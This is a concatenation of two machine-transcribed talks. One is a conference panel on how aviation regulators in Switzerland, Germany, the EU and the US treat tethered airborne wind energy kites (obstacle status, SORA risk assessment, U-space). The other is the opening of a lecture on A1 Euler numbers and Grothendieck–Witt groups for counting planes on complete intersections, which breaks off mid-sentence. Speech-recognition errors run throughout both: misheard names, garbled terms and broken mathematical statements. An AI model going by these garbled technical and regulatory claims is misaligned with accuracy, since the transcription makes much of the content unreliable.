Well, I'll present an alternate point of view. I'm Neil from Makani. I also come from the aviation world, as a pilot with a couple thousand hours of operating time in the US military, and I will make the case, and I'll do this in my talk tomorrow as well, that we're talking about wind turbines, not aircraft: wind turbines that are obstructions, much like a tall building or a tall tower, or in fact a conventional wind turbine. And in every case, practically speaking, from a pilot's point of view, if you were to look out on the horizon, you would not expect an energy kite to be in one part of the sky one minute and another part of the sky the next minute. It might be moving locally, but it's there. And if I go through my process of navigating from point A to point B, I do a chart study, I know where the obstructions are; they're either on the chart or they're noted through the standard procedure that's already in place for all obstructions. If I have failed to do that because I'm a bad pilot, then the kite energy system is marked and lighted in an appropriate way as a backup. But those are standard obstruction methodologies that have been in use for a long time. That is from an airspace perspective, because from an airspace perspective, what we're trying to do is protect against a pilot having an unplanned event with any obstruction, whether it be an airborne wind turbine or a more conventional wind turbine. From a ground safety perspective, and we talked about that earlier, I think you can also use the same basic principles that are in use today with horizontal-axis wind turbines: if the kite comes off the tether, it's no longer powered, it's not going very far, it's not going to fly from point A to point B, it's going to basically go straight down, which is very much like a blade coming off a conventional wind turbine, which has happened. I think it's easy for us to get into this mindset now, where our systems are still relatively immature, and therefore maybe not as reliable as we want them to be in the future, but we need to imagine a future where the systems are highly reliable and can therefore operate under the same constructs, the same procedures, that the industry is using today. And if we have that in mind, we can leverage the existing commercial standards and practices that will help us integrate with the existing energy generation industry as it exists today. My final point before I hand it off to Mike is that what has been offered from EASA, etc., is certainly European-focused, and I think if you look at where the markets are for everyone, they are not going to be in the scenarios that are mostly being considered. I generally agree. With all the experience that we have gathered in the first years, we look first at making sure that our system is safe and the physics is safe, to avoid any problem as much as possible. And then there is our actual testing area: we have the air range, so no aircraft is allowed to come across. The height limit on it was 1.6 km, and I agree with that. But also, in any case where an airplane with a transponder on board comes across and crosses this airspace, our system recognizes this and goes below 100 feet to avoid a collision. That's the same agreement we have with the rescue helicopters just 2 km away, just a bit outside the range. If they approach or they launch, then we go down to 100 meters, and once the signal is cleared, the kite goes back to operation.
And then, as always, we have to care about what happens if. And if we lose a kite, we have a safety device below the control pod: there's a safety line connected to the canopy, so the kite then flies out an additional 20 meters, is caught on that line, and comes down like a parachute. And if you add more of these safety measures, it was relatively easy. Well, sorry, it was a long way, half a year, but I think finally we convinced the flight safety operation people and also all the pilots around the airport close by. It was convincing work, yes, but finally it worked. So, back to the ground. So my name is Nataniel Aptur, I'm an advisor for the Federal Office of Civil Aviation, and I'm in charge in Switzerland of operational approvals, especially in the specific category that we were talking about before. I don't really want to position myself in this obstacle-versus-certification debate, because we Swiss always stay neutral. I think, in the end, most people would probably agree that we are here in a new field, where we come out of, first of all, traditional aviation, but we also come out of traditional wind turbines. So we have a new technology that needs to be handled in a way where the requirements are tailored to the operations that you have. Especially because some of your devices are maybe 50 kilograms and some of your devices are maybe one ton, you cannot really use a common certification basis for all these technologies, right? I mean, you have the traditional CS-22, but again, if you think about the risk of a device that is 40 or 50 kilograms, it wouldn't make any sense to apply a certification like CS-22 or the ARDA, which is far more stringent than what actually should be applied for such an operation, which mostly happens offshore anyway. So I guess here I will agree with Mr. Mohrman on the fact that the specific operational risk assessment, this new guideline, the methodology provided by JARUS, is probably the right tool to assess what is required and whether or not you comply, with certification, or with a higher or lower robustness level. And this really also covers the obstruction-or-obstacle debate, in my opinion, because you can easily account for the fact that it's an obstacle in the SORA, and so allow operations to take place without much burden in the end and without much involvement of the civil aviation authority. Yeah, I'm from TwingTec, and first of all I'm proud that some people from Switzerland are sitting on this panel. It also shows a bit that there's quite some work and action in this field in our small country. Some people also say that Switzerland is the Silicon Valley of drones, and if that's true then it's also because of you guys, because you allow us to fly around with this stuff. I think that's definitely one of the advantages of a small country, that you can talk to people and they listen to you, or some of them at least. And yeah, just what I want to say: we went through this SORA process just this year, and we didn't have a choice. But I think it was also, I mean, we finally got the permission for our system to fly and operate on two sites. And honestly, initially I was also a bit skeptical, because we have had an individual test site for many years in Switzerland. Initially it was kind of a special arrangement, and it somehow worked and it was fine. And then suddenly this whole drone regulation is coming up, and you couldn't just handle the special case anymore.
And it turned out that we somehow also had to fit into this kind of drone scheme. And what you don't realize at first is that this SORA process actually, as you mentioned, really takes care of our special cases. So it's a risk assessment, and basically the fact that we are tethered, that we are not just flying over cities, that we normally operate over rural areas, also brings down the risk. And I think what we learned is that really going through that process helped us a lot to understand the risk better and really come to a safer solution. So at least at this point in time I would say that it's very helpful, and I basically think it makes a lot of sense for every one of us to at least look at these documents and see what we can learn. Thank you. Yes, we at Ampyx Power, in fact, agree with everything that has been said before. There is not that much of a conflict, and mostly I do subscribe to the roadmap that Christian presented in the beginning. And as for our own system, maybe it's particular in the sense that, for the case that the tether breaks or might break, we do intend to recover the aircraft, so it has to fly back to our platform and be recovered. And also we have designed the architecture to eventually be able to find co-use configurations, so it's farmers operating under our systems, or maybe over a nature reserve that people would visit, this type of co-use. With this in mind, for this type of situation, under the rules in Europe we are an aircraft. We have to follow the rules, the EASA rules, and then we end up in the specific category of operations with an aircraft that has to be certified. We are not particularly afraid of that, although we do also want to negotiate shortcuts and actually make proposals for them where we believe it is possible, and we do restrict the flight certificate to a special type of operations. We think this is really a flexible scheme, at least in Europe. For specific operations, we can actually pick a certification standard and write our own acceptable means of compliance, and this is what we've done and proposed to EASA, and it's up for approval there. And the last thing I want to say is that if we want to eventually have a commercial operation, we want to achieve immense levels of reliability. The safety requirements for an airborne wind energy system are less demanding than the commercial requirements. So in that sense also, for us it's not too intimidating. I just want to explain to you how we see the way to integrate unmanned aircraft into the airspace, including airborne wind energy systems. It's the so-called U-space program. The U-space program is a federated set of services designed to ensure safe, secure and efficient operations. So the first goal is the integration of both manned and unmanned aircraft in the airspace, in collaboration with all involved parties. Unmanned means the so-called drones and also the airborne wind energy systems. So why do we want this U-space? As you may know, there are already a lot of airspace users, but now we have to deal with the drones, and operations with drones are becoming more and more complicated. And their operators have this need to fly beyond visual line of sight. So we created this U-space in Switzerland, but not only in Switzerland. EASA is now writing a new regulation, the so-called U-space regulation. And this set of services can include detect-and-avoid and also geofencing.
And there are a lot of services, like remote identification. So what's the point for the airborne wind energy systems? There are three ways to see it: the obstacle approach like in the United States of America, the certified approach like Ampyx, and the SORA process that we apply in Switzerland for now. And so when you are an obstacle, with the new services that we provide with U-space, you are visible on our interface. So all the drone operators, all the aircraft, can just see that there is an obstacle and avoid it. When you are certified, or when you are in the SORA, you have to be cooperative. So you have to speak with each other, with the unmanned aircraft but also with the manned aircraft. So how do we see this? We have to use the new remote identification. It has to be technology neutral, so it can be network-based, broadcast, or also a transponder. We have no preference, we have not decided, but you just have to be cooperative. So this is the way we want to implement the new U-space system. And in America there is also a U-space equivalent called UTM, but it's the same way of seeing it. So we try to implement it and it's on the way. Maybe in one year we will have this interface. So this is the way we see the future with airborne wind as well. Thank you very much. Thank you very much. So to keep up the panel discussion, because we've heard a number of interventions now from you, perhaps in this first round I would just give you the opportunity to answer each other, or whatever comments you have to the other side, before I hand this over to other questions. Does anybody want to react to what was said here? I think we are very much on the same page. We all know it's about safety. We just have different ways, and that's what I thought during the U-space presentation: we have different ways of achieving this required level of safety. So different approaches are there. One of our obligations, or maybe it's your obligation, or it should be your task, is to harmonize this in a way. That's what I like: that you summarize this and give us options. And maybe there is one option, maybe there are two, or maybe there are even three options in place. And that's what we have to do on the way to the standards that we will get. One thing I forgot to mention is that there will be something like what is called a standard scenario, if that word is correct. So it can be, for example: if you use drones within a small area, for example for inspecting wind turbines, there is, or there will be, a standard scenario in the future. So all people will know exactly what to do, and that's something we have to push for as a sector. So for example, if a tether is broken or ripped, or if you want to release a tether for some reason, then we suddenly become an air vehicle at that moment. And that's what we have to solve and settle according to safety standards: what we have to do. So what I'm hearing here, that's pretty much the same. So we know that we are in the airspace, and in Germany we have the DFS, the Deutsche Flugsicherung. And what we currently have here, we have an arrangement in Germany for airborne wind energy, and all our data on each flight is automatically transferred into the framework of the DFS. It's not a real transponder; they don't want to have thousands of transponder signals in the air, that would confuse aviation. So they gave us a special means by which we can directly feed our information into the system.
And that can be something that can help for the air pumping energy at all. So the standard is developed on AMPEX data, I really like the work. You have done and then there has to be a way. How nice or how can we make things more easy taking the new drone regulation, which will become active, that will relieve some equipment. We should make use of all of these effectiveness. Thank you. I think if I'll start with the common ground is that we all are focused on safety. So I think a final agreement across the panel that safety is got to be first. I think what I'd like to deposit is that the procedures and standards already exist. They exist for wind turbines today. And to call any of our systems a drone fundamentally misunderstands the technology. And to recreate a system, to recreate a process that has to be navigated and help the aviation world and regulators understand that new process will disadvantage airborne wind unnecessarily. So I'll give you the example of Makani in Hawaii. We have had a conversation going with the FAA for twice in time. We're less than five miles from an airport. We are just a few miles from military. The FAA has been out to observe the Makani system operate a couple of times and what they have determined, it is a temporary determination now that we expect by the end of the year that will be a permanent determination that will be regulated like any other wind turbine in the United States. That they wanted to have some say in how the kite was lightened in March but other than that, starting once we get this permanent determination which is eminent if we were to build a Makani site in Kansas or Florida or anywhere else Makani would submit an application for a determination of no hazard into the same line of, into the same group and the same exact application as anybody who is trying to put up a net tower or a tall building or to put up a wind turbine. It's the OE or the construction evaluation group. It's a process that already exists. It's a process that wind turbines have been, wind turbine farms or wind farms have been using for many, many years and now Makani is in a position where we're just going to fall in line with that same exact process. And I would say to go back my assertion that it's to fundamentally misunderstand the technology that we're all trying to bring to market is through that assessment to say again it solves the problem you're trying to solve. And I think going through all of this is going in a different direction. So I would ask all of us to think about what is the problem you're trying to solve. And as a pilot, again, I want to know what the obstructions on our route are. If I fail to do a map study, then I need to be able to, as a backup, I need to be able to see the system. Okay, comics. Yes. First of all, I forgot to say that before, but thanks a lot for inviting us from the POCA. I think it's really important to have this exchange between regulator and industry with the shades that we are the only regulator represented that I own. You should be changing. Actually, we are really proud because it's not a regulator. But yeah, so my opinion is really important to this exchange and for us to understand what your needs are and how the technology is evolving and for you to understand what we expect. And yeah, to come back on the standard scenario discussion, the standard scenarios that can be developed by the other are just restricted to low-race corporations, this represents in sole return to save two or more. 
So it could be the case for some operations, but that's just to keep in mind, right? To come back to the discussion about drones or not drones, I think in my opinion it's not really important to know whether it's a drone or not because obviously no one knows really what it is. I mean, it might be a drone in certain flight phases, it might be something else in other flight phases. Maybe it's a wind turbine. No one really knows and in my opinion it's an energy system which should be dealt as such, not as a drone or as a wind turbine or as anything else. But again, since your needs are really different, all these companies that are represented here have different sorts of devices. I think the solution that might be suitable for one might not be suitable for another. And that's why it's maybe also really important to have this discussion with the regulator and make him understand what your needs are. I mean, our duty is not to make your life complicated, right? Our duty is to ensure safety. I think the safest way to integrate it is not to consider it as a drone, but to consider it as an obstacle. Then you should be proactive and go to the airspace specialist at the EASA and tell them, well, look what we did with the FAA, look how they considered it, what reflections were behind it, and maybe they will recognize this way to handle those sorts of operations. And maybe you can also fly as an obstacle in Europe. I mean, regulation is anyway not static, right? It's something which is evolving over time, that's what we know. So in my opinion, what is really important in this discussion between the industry and the regulator because if there is no discussion, then we will make rules which do not make sense. Yeah, I like this approach, I must say. Because now we have a clear risk assessment at the end of the day, and on the other side, even we are fixed, we are moving and understanding pilots. I've been talking to pilots of the rescue helicopters and all these things because we are not fixed, we are moving target, so... And they are not sure if it's staying there or it's going away. So I understand. On the other point of view, on the discussions, I must say we didn't talk to the authorities, but we have to provide our experience. And that was the entrance for us to...in a discussion that we said, okay, first let's make it bad, first space where we can operate, and then let's observe what happens in the safety environment. And I would like to have the planes always transport, because these areas, just felt the height and the position, because then we can react, it's easy to react. But on the other side, I understand too much of the planes in the... On the other side, Europe is for us just as important for testing. And perhaps we're going to have in some years also we'll have to... which are clearly marked on each map and with lightness around it. Yeah? Our market for small products is in the ocean, the South America or whatever. And there we have other political interests in the environment. We have seen that also in Russia now, it's very easy. We had...we had just to provide them to a description of our safety measures. And then we are marked in the maps and then... Never let me care also. That's good to hear. I can maybe be here then I will ask how you... Yeah, I think we've all acknowledged that we are primarily developing an energy generation device. That is the purpose and that is how we should approach it. 
In the first instance, but we cannot also not deny that there is an element in it that is not like a wind turbine in my views. And I need to push it a little bit with when you look at your beautiful system in here. You say, look how beautiful it is rotating. You say, look how beautiful it's flying. You don't get the answer. I think of the word we use, I think it's less important than the actual space that occupies. Anyway, you understand my point. The cross, it's an aircraft because of the reason that you said it. And that you understand their own system quite well. But they can also see their other views. I think actually your case is a bit different. Your tender is really quite structural in its essence and quite static in our situation. We really have to design that tender as thin as possible as we used it in the book earlier. We don't want that to never break because that would be a way to have it reduced in order to perform. So we don't have to look for the difference and make it as thin as possible. So with the topic that I have, it is a little bit more likely that we would be able to have the same kind of option. Thank you. Well, the theory we have only five minutes left, but since we are in the last session of the day, we may go on. So let's open the floor and some other questions. Thank you. The question is, how on the FAA sees a data break or how do you somehow guarantee that the level breaks? Yeah, we discussed that with the FAA. It's a mechanical system. There's no way to guarantee that the Tether will never break. We described it as I did earlier, which is that when the kite comes off the Tether, it is unpowered and is therefore not going to go flying off across the night. I mean, honestly, that is a fundamental conversation we've had with basically every regulator that has come to talk to us. They come out there thinking drone, thinking that this is an airplane, and the minute they hear, oh, wait a second, it has no power if it comes off the Tether, they take a deep breath and they just say, I get it. Okay. Because the only place it's going at that point, it's going to have a splash pattern, of course. It's controlled or not in that splash pattern. Irrelevant. The point is, it's not going very far. And to the point of, again, if you think about it from a pilot's point of view, that's the problem we're trying to solve, is that there are other aircraft, other, whether it be drone or manned or unmanned, just take the pilot's point of view. It's not in one piece of the sky in one minute and another piece of the sky in another minute. It's not even global. Even if it's going up and down, even if it's going in wide circles, wider than a conventional wind turbine, it is still global. Think about how big the sky is if you're flying even just 50 miles. It's very low. Quick follow-up on this. Is it designed to not glide or can it not glide very far, especially with the time measures? I think that's, it's easy to imagine, let me answer it this way, easy to imagine programming the kite to seek upwind back towards the base station. So you don't really crash by the troops coming down smoothly? I mean, for the purposes of this discussion, it's kind of irrelevant, right? I think the point is... I don't understand, but you're saying we'll try to recover it with more progression. 
Yeah, but I still think that it doesn't fundamentally change the premise of our position that whether it comes down in a controlled manner right next to the base station, it is operable the next day, or it has a much more dramatic meaning with the Earth. Well, for me, it would make you... If you know it, it crashes down. For me, that sounds not so safe as I know it. I know it comes down like this on the kite or it moves you to the... This is where I want to answer it, but I think about the future, and it's true that today we're not allowing any people under our system. But think about Airbus. I got an Airbus A320 this morning. Sometimes airplanes crash, but I still got an airplane. At some point in the future, airborne wind is going to be reliable enough to where we're more comfortable taking risks, such as getting an airplane. Great. Any other questions? At this point, it's an airplane, and an airplane has to be registered as an airplane, and has to be tested as such. And if you allow people below your structure or your wind turbine or however you want to call it, it has to also be tested as an airplane as soon as it breaks. Like, yeah, it's flying. I think that's directed to me. I will say it's not an airplane. It operates using principles of aerodynamics that aeroplane uses, but functionally, it's a winter airplane. Maybe we can also... Yeah. Let me just comment on this. So what I assume, if it's easier for one of you to have it as a qualified... I don't use word search, but qualified as an aircraft, do it as an aircraft, do it this way. And it's easier for you, or reasonable for you, to qualify it as a device, like my car, than do it that way. I think there are both options available. But if you treat it, and I totally agree with what you said, if you treat it as an aircraft, for example, if you want to save it, the tether breaks, and then you have some wires landing it, maybe even in a position where you can do maintenance right away. So if you want to do this, and there's a way now, which is pretty easy to achieve, this Zora allows you to deal with that. And the Zora approach is getting much easier compared to what its typical certification was. So I think we need this freedom, and that's a system design, what we do in order to achieve it. So how we do it the way we have some un-picks powered, different other ways. So all of them are fine, and we just have to find a standard, which can, in a way, combine some of these, and you get to do the right options for those. I had a question regarding, you know, all the test installations, as well as the current installation, regarding the use of that airspace, and people nearby saying, hey, I don't want that in my airspace. I don't want that in my visual field, not in my back door. Have you experienced any feedback from the public about that, even with the test installation? Yes, we are testing on our side, like those two small footage. So, I really like the people who are doing the test, and all the other things, there are a lot of conventional windows, I think, that have been very convinced by the low noise, and that has always changed the position, and the most head-to-head low noise, and all the things that we've done from it. With people saying we don't want to see the system all the way back, or the neighbors say we don't. So, we have very good neighbors, actually, so we operate in a rural area, but it's definitely populated, so their houses are close by, and we have regular contact with the farmers, we contact them. 
So, before we do the operations, we check that we can find out about that, and we call the department Q and the advice, and we'll write them down. So, we have that at the operation. Do you have any questions? I'm actually going to consider the tank and the land, so that's probably what it is. But you're also talking about this active avoidance of air problem. I'm wondering how this fits with this obstacle view, and how often you think this should happen. Should there be more emergency hand-office? So, it's a regular operation, it's a plan B, because we have a better airspace, and airplanes are not allowed to cross. So, it's marked with a map, it's also indicated by no time, and the official information sites. But, nobody knows. Some body comes across and comes up with whatever and flies through this area. And there, we are looking at, you know where they are, and if they come close, then we can dive into that. That's the approach. It's a plan B. And this plan B is a plan A for the helicopter operators close by, for the rescue helicopters. So, there you agree with them, if they have no choice, if they have to start quickly, and if they have to take the direct way, and so, if they start the radio communication, our character is done. So, let's agree with them. And this operation is just because we are wearing clothes. It could be also a solution for other places in the world. But we are really in the moment looking for Germany or for Europe, just for three places where we plan to install such systems, because the market is out of order. Alexander will enter. To add on this question, so Germany is a low, and for next year, all the structure markers on the lead to ground will be only switched on on occasion. So, all of Germany should be connected to the radar, where it can be connected by law. And therefore, with our experience, maybe that answers your question, that the on time of these obstruction markers is about 25% depending on the region, and of course on the accuracy of the friction. So that's a lot of learning on some of the filters, how we can see the small birds and planes and the portion which is possible on the road, which can also be detected in the same ground. So, of course, when it comes to the question of what we are in terms of regulation, there is of course a future to have a lead to ground by means of an airborne device, which is not an obstruction, because there is no case where it appears in the air when it wouldn't be an obstruction, because it is hovered down and connected with the radar system. And what I think is a big achievement already for this industry is that we have, at least the Chief of the county and others to say, okay, here we have now an important anchor, all our safety considerations, that we ensure that this system is either visible, or it's not airborne, or it's not in the path of what they're flying. And I think there is something to work on this, and this will be something we can agree across all industry, and we should focus exactly on these basic principles of obstruction marketing and obstruction avoidance. I mean, so now we have five minutes. One quick suggestion, I think there are two completely different issues, and sometimes we forget that they're different, we can all, one is making sure that there is safety for other people who are in the air, pilots, and the other issue is safety for people who are on the ground. 
And these have to be thought of as two separate things, and just to clarify, McCloney's approach to the great job, we deal with safety for people in the air by the existing FAA obstruction, and actually we use the same approach in Norway, and we deal with safety for people on the ground by having huge exclusion zones and keeping people away from our system as it's still experimental. So, as we try to make progress this topic, let's be sure to look at which topic we're talking about. I would say we have a final round, everybody can say anything. The next issue is the FAA, but the SORA basically entails both the ground and the airways, and you're right, it's two separate things, but actually in the traditional aviation you assume that the people that you create safety for people on board, and because of that you secure people that are on board. And that's not for the, what is special with the specific operational risk assessment is it's a new approach which is based on the fact that there is no one on board, and since there is no one on board, you assume you search for the safety of other aircrafts, other airborne aircrafts, and then for people on the ground that you are not really searching for the safety of people on board because they're in the air. So, I think there is no one on board at least so far in on roads, and that's really part of the SORA also, and that's part of the world discussion. But I think the main issue we all have is space integration, and I guess, yeah, is that because that's what we mainly discussed here. Thank you. I'm sure they have much to add, but maybe also a little bit to your question. When we fly our systems, we actually have quite regularly aviation tourists that you can get restricted to, they fly around it. So it's very difficult to predict what is their plan, and at your plan, we don't have that, and we don't plan to avoid general aviation. They should just stay out of our area. You're also my answer, just to form a add that the most important thing is that we are in discussion with the military orders, and we have permission to fly as our system and learn. And so, I'm staying in touch and I'm trying to find the right way to really find the right tools for the proper development where we are. I think we're at least as fit as we can on a good track. Thank you. I think the first thing is that we have two major lines to say, and then the second is to prove that they say collaboration, and then start with the regulation of the rules. Yeah, I want to extend the idea that speaking with regulators early is important, so thanks for being here. Appreciate the conversation. And I think my part and thought would be to think about the inevitable success we're all going to have in a commercialization of our technologies, and what will enable that for a regulatory standpoint is aligning ourselves, not creating a whole new way forward, but aligning ourselves with an existing and workable solution. So I think at the end, you industry have to bring us your standard, your need, come to the regulator, and we will figure out with you what is the most applicable solution, and at least maybe come to the EU, and create maybe a new regulation or just complete a regulation and to have a solution harmonized for each technology. So you can open the market and just don't have one solution in one country and just operate with Zora and just operate our center side or as a obstacle. So just go, go, just bring the standard and just go for it. 
I think it's just important to make something like a risk assessment, whether it's based on an obstacle or whether it's based on a real flying system. So whoever has not had a look at Zora yet, he should do that, even if he thinks between an obstacle, we don't care, and Zora uses ground risk areas and all these aspects, and Zora will be of help, I'm pretty sure. Then discuss it with the regulators, and I have a couple of German regulators they will pay to open with that topic, so go ahead. Yes, Zora, thank you very much.
|
This panel discussion also includes a short presentation by Amanda Boekholt, Swiss Federal Office of Civil Aviation (FOCA), about the U Space set of federated services.
|
10.5446/50925 (DOI)
|
Thank you. It's been a very interesting summer school for me so far. So thank you very much everyone for putting this together and for the opportunity to speak. This is all joint work with Tom Bachmann, who you heard from a few days ago. And we'll start with the application to counting linear subspaces. Let's give ourselves notation: K a field, and F1 through Fj homogeneous polynomials that are going to cut out what's called a complete intersection in projective space. So there are the homogeneous coordinates of projective space, and we can look at this variety X which is the common zero locus of F1 through Fj. And if this is dimension N minus J, that's what it means for X to be a complete intersection. So we're going to be counting linear subspaces. Let's say explicitly what a linear subspace is. So an R-plane in X is a copy of P to the R cut out inside P to the N by linear equations. We're going to let these linear equations have coefficients in some field extension E. And then it will be an R-plane in X if it sits inside X viewed as a scheme over E. So there are our linear subspaces of dimension R. So the space of all linear subspaces is a Grassmannian. This is a Grassmannian parameterizing the R-planes in PN. Equivalently, it's the space of R plus one dimensional subspaces of an N plus one dimensional vector space. And we've got some different choices of notation for this. Let's go with Gr(R, N), and here if we have a subspace W, we can take its projectivization and we get a PR. We can even make it a different color. The subspace W is a point in this Grassmannian and goes to its projectivization. And there we've got some notation for the Grassmannian. Excuse me, there's a question for you in the chat. You want this. Great. Thank you. So Hain says it's just a closed subscheme. Let's talk about A1 Euler classes and numbers. And then we'll talk about the scheme Y, the section S, and the Euler class in the oriented Chow of Y twisted by the duality determinant. For this other class, there's a one in oriented Chow, and you can push forward the one by the section and pull back, exactly as Marc outlined. Although we haven't introduced oriented Chow, it's a sum of cycles with coefficients, and let's not worry about that too much at the moment. And this was further developed by Fasel, and Asok–Fasel, and Marc Levine. Another description of the Euler class is that it's a principal obstruction to having a non-vanishing section, and in A1 algebraic topology over a field, Morel develops an Euler class encoding that principal obstruction. In joint work with Jesse Kass, we made an Euler class designed for enumerative problems; it was the sum, over the zeros of S, of local degrees of S. This is an Euler number. In a beautiful paper on fundamental classes, Déglise, Jin and Khan give constructions of Euler classes. And in particular, Marc, I'm going to talk about the Euler class
valued in cohomology theories that are represented by SL-oriented spectra. Another thing that Marc talked to us about was a pairing on the Koszul complex, in joint work of Levine and Raksit, for the tangent bundle. Actually, after a talk I gave, the pairing on the Koszul complex was brought up and asserted to be the same, and I've heard Marc tell a nice story about a similar response of Serre. I'll just put everybody's name down, if that's okay. The last item in our list of points of view on Euler classes here is to take the opportunity to talk about my Women in Topology group, looking at the Hochschild homology and putting on it the pairing that the folks who think of coherent duality in terms of Hochschild homology give us, and showing this is the A1 Euler class. And this is work of Candace Bethea, Niny Arcila-Maya, Morgan Opie, and Inna Zakharevich. So one of the things done in the paper that this talk is about is to check equalities for some of these: the local degrees and the pushforward for appropriate E, and the Koszul one, for general vector bundles. As a warning, there's a very interesting paper of Asok and Fasel about comparing these two, and they are equal up to a unit, but in a context where there are actually quite a lot of units. So it's an interesting class, it's an interesting number, and there are a lot of different points of view on it. For moving forward with the story, let's summarize this by saying: when Y over K is smooth, the dimension of Y is the rank of the bundle, and V satisfies a generalization of orientable called relatively orientable, then we have an Euler number. I'll call it e(V), living in the Grothendieck–Witt group of K. I'm going to spell out what the Grothendieck–Witt group of K is very explicitly, because it's concrete, and our counts record concrete arithmetic information valued in this group. So, the Grothendieck–Witt group: let A be a ring. GW(A) is going to be the group of formal differences of non-degenerate symmetric bilinear forms; this group of formal differences is called a group completion. And for a field, this has a very nice presentation. So, presentation: for K a field, any symmetric bilinear form can be diagonalized, so the generators are one-dimensional forms ⟨a⟩ for a in K star, or K star over K star squared, as in Marc's talk. Here ⟨a⟩ is, on the one-dimensional vector space K, the bilinear form K cross K to K taking (x, y) to axy. The relation is that ⟨a⟩ plus ⟨b⟩ equals ⟨a plus b⟩ plus ⟨ab(a plus b)⟩ when a plus b is not zero. And this implies that there are a bunch of ways to write a special form called the hyperbolic form: ⟨a⟩ plus ⟨minus a⟩ is this hyperbolic form h equals ⟨1⟩ plus ⟨minus 1⟩. I'll give a whole bunch of explicit examples. For the Grothendieck–Witt group of C: up to squares, all elements are the same in C star.
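As a reader's aid, here is a compact LaTeX restatement of the presentation just described, for K a field of characteristic not 2; the way the relations are grouped below is my own summary, not the speaker's blackboard.

\[ \mathrm{GW}(K) \;=\; \Big\langle\, \langle a\rangle,\ a\in K^{\times} \ \Big|\ \langle a b^{2}\rangle=\langle a\rangle,\quad \langle a\rangle+\langle b\rangle=\langle a+b\rangle+\langle ab(a+b)\rangle \ \text{ for } a+b\neq 0 \,\Big\rangle, \]
\[ h \;=\; \langle 1\rangle+\langle -1\rangle \;=\; \langle a\rangle+\langle -a\rangle \quad\text{for every } a\in K^{\times}, \]

where \(\langle a\rangle\) is the form \((x,y)\mapsto axy\) on the one-dimensional vector space K, and h is the hyperbolic form.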
So if we just take the underlying dimension of the vector space, the Grothendieck–Witt group of C is Z, by the rank. And over R, when we diagonalize, we have some number of ones and minus ones; the difference between those is the signature, and that induces an isomorphism up to a parity condition. For fields like a finite field with q elements, or C(t), we have that the first two invariants of quadratic forms coming from the Milnor conjecture give the whole Grothendieck–Witt group. The first two are the rank and the discriminant, that's the determinant when you write the bilinear form as a matrix. So this goes to Z cross k star over k star squared, which, let's say q is odd, gives Z cross Z mod 2. And then we have invariants coming from the Milnor conjecture, which was a great achievement of A1 homotopy theory. The title of this talk was about integrality results, and that means that we want to use where the vector bundle is defined. If it's defined over Z or some sort of ring of integers, we want to compute, or say things about the computation of, what the Euler number is. So let's also say what the Grothendieck–Witt group of the integers is: although there are many very interesting, highly non-trivial, non-degenerate symmetric bilinear forms over Z, once you group complete you only get Z cross Z; it's a number of ones and a number of minus ones. For instance, it sits inside GW of Q, or GW of R maybe more straightforwardly. We have a Milnor exact sequence giving us the Grothendieck–Witt group of Z[1/n]: it sits inside the Grothendieck–Witt group of Q, and then there are some boundary maps to the Witt group, where the Witt group is the Grothendieck–Witt group divided by the hyperbolic form, for q not dividing n. The last thing we'll need in order to state results is to explicitly give transfers. The only thing we'll need to write down theorems is transfers for an extension of fields L over K, which we can assume to be finite separable, because the Debarre–Manivel result will say that our zero locus is smooth and so corresponds to separable extensions. And then we will have a transfer map, for L over K, from the Grothendieck–Witt group of L to the Grothendieck–Witt group of K, and it takes a bilinear form beta from V cross V to L to the composition of beta with the sum of the Galois conjugates, the trace from Galois theory. So let's talk more about Grothendieck–Witt, but I also want to pause for any questions so far. If you think of others, please don't hesitate to interrupt. So the GW of fields pieces together to make an unramified sheaf, by a procedure in Morel's A1 algebraic topology. So it gives an unramified sheaf GW, say on smooth schemes over k, and the sections over X sit inside the sections on k(X), the field of functions of X, and you can extend over any closed subset of codimension at least two. It's given by the intersection of kernels of certain boundary maps at codimension one points, and it has an alternative description.
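Before the sheaf-level description continues, here is a LaTeX recap of the concrete computations just listed; the labels rank, sgn and disc are my own shorthand for the invariants named above.

\[ \mathrm{rank}\colon \mathrm{GW}(\mathbb{C}) \xrightarrow{\;\cong\;} \mathbb{Z}, \qquad (\mathrm{rank},\mathrm{sgn})\colon \mathrm{GW}(\mathbb{R}) \xrightarrow{\;\cong\;} \{(n,\sigma)\in\mathbb{Z}^{2} : n\equiv\sigma \bmod 2\}, \]
\[ (\mathrm{rank},\mathrm{disc})\colon \mathrm{GW}(\mathbb{F}_{q}) \xrightarrow{\;\cong\;} \mathbb{Z}\times \mathbb{F}_{q}^{\times}/(\mathbb{F}_{q}^{\times})^{2} \cong \mathbb{Z}\times\mathbb{Z}/2 \quad (q \text{ odd}), \qquad \mathrm{GW}(\mathbb{Z}) \cong \mathbb{Z}\oplus\mathbb{Z}, \]
\[ \mathrm{Tr}_{L/K}\colon \mathrm{GW}(L)\to \mathrm{GW}(K), \qquad \beta \mapsto \mathrm{tr}_{L/K}\circ\beta \quad\text{for } L/K \text{ finite separable}. \]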
It's the sheafification in the Nisnevich or Zyrsky topology of sending x to GW of x where now this means the symmetric non-degenerate bilinear forms on vector bundles on our on our x and this is a great sheaf but from the perspective of of descent sheafifying isomorphism classes is an odd thing to do when we if we want to glue together objects we not only want to know their isomorphic on overlaps we might want to keep track of the data of that isomorphism have it satisfied conditions so one thing that that that comes up is that you can have a sheaf of spaces version make it a curly curly GW so let bilinear of x be the space of vector bundles with a symmetric non-degenerate bilinear form and then we can sheafify the group completion of this so let's let one half be invertible let's let these be schemes over the one half and have this be a sheaf valued in spaces and what let it be the sheafification of x goes to the group completion of the this these bilinear forms and there's a map to the sheaf of spaces associated to her mission k theory we've got a homotopy invariant version on the right and our sheaf version of Rothen diek that sheaves on the left we can take other classes in the in in her mission k theory or related theories and get good functoriality properties associated with them to give us integrality integrality results let's get back to counting our planes and less questions yes um so uh it's necessary to invert two um uh when when considering duality so bilinear forms there are a lot of different um that there when when two is not invertible bilinear forms and quadratic forms are different turns out there are a lot of different variants um uh uh for um uh for four notions of um uh of a duality on on vector bundles when when two is two is not invertible um uh so um it uh it makes a her mission k theory defined with with current uh machinery and there are a lot of interesting things to say about inverting two uh so so thank you for the the question returning to to counting our planes on complete intersections um let's listen to things we know um uh in in joint work uh with jesse cas we computed the account of lines on a on a cubic surface which is the the computation of the Euler number for sin three of s dual on the gross monion and it is 15 1 plus 12 times minus 1 and uh it's this is also a song over the lines of an index involving the field of definition of the line and some some information about how the tangent um how the tangent plane spins along the line um uh this is for k a field and um mark levine developed a theory of uh bit valued characteristic classes and uh computes that uh uh the Euler number of uh sin of uh 2d minus 1 of s dual counting lines um on uh um um pd plus 1 is uh 2d minus 1 factorial factorial tell you what that means uh plus a multiple of h and the multiple of h is is designed uh 